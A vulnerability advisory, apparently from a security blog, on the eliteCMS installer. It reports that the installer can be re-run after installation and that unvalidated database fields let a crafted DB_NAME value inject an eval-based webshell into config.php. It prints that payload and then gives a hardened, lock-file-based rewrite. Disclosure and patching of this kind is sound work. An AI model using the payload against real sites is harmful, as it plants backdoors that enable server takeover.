eliteCMS: installer not locked after installation + one-line webshell written to config.php

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation completes, so anyone can re-run the installation simply by visiting the installer URL.

A second vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
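For comparison, here is a hardened version of the step-4 config writer, added here as an example and not taken from eliteCMS; the config path, the lock-file name and the allow-list patterns are assumptions made for this example.

```php
<?php
// Added example (not eliteCMS code): a hardened rewrite of the step-4 config writer.
// Two fixes for the issues described above:
//  1. refuse to run once an install lock file exists, so the installer cannot be re-run;
//  2. never splice raw request input into PHP source: embed values as escaped string
//     literals via var_export() and reject DB names outside a strict allow-list pattern.
// CONFIG_FILE and INSTALL_LOCK paths are assumptions for this example.

define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');
define('INSTALL_LOCK', __DIR__ . '/install.lock');

if (file_exists(INSTALL_LOCK)) {
    http_response_code(403);
    exit('Installation already completed; remove the lock file to reinstall.');
}

// The same four fields the original installer reads from $_POST.
$fields = ['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'];
foreach ($fields as $f) {
    if (!isset($_POST[$f]) || !is_string($_POST[$f])) {
        exit("Missing field: $f");
    }
}

// MySQL identifiers and hostnames have a narrow legitimate alphabet; enforcing it
// rejects a value containing  "?><?php  before it ever reaches the file.
// The password is deliberately not pattern-checked; var_export() below keeps it safe.
if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $_POST['DB_NAME']) ||
    !preg_match('/^[A-Za-z0-9_]{1,32}$/', $_POST['DB_USER']) ||
    !preg_match('/^[A-Za-z0-9_.:-]{1,253}$/', $_POST['DB_SERVER'])) {
    exit('Invalid database settings');
}

$write = "<?php\n";
foreach ($fields as $f) {
    // var_export() emits a quoted, escaped PHP string literal, so whatever the value
    // contains (quotes, ?>, <?php) stays data inside a string and is never parsed as code.
    $write .= 'define(' . var_export($f, true) . ', ' . var_export($_POST[$f], true) . ");\n";
}
// No closing ?> tag: nothing can be appended after it, and no trailing output is emitted.

if (file_put_contents(CONFIG_FILE, $write, LOCK_EX) === false) {
    exit('Could not write config file');
}
// Create the lock so this script refuses to run a second time.
file_put_contents(INSTALL_LOCK, date('c') . "\n");
```

With these changes the payload shown above is rejected by the DB_NAME check, and even a value that passes the allow-list can only ever become the contents of a string literal in config.php.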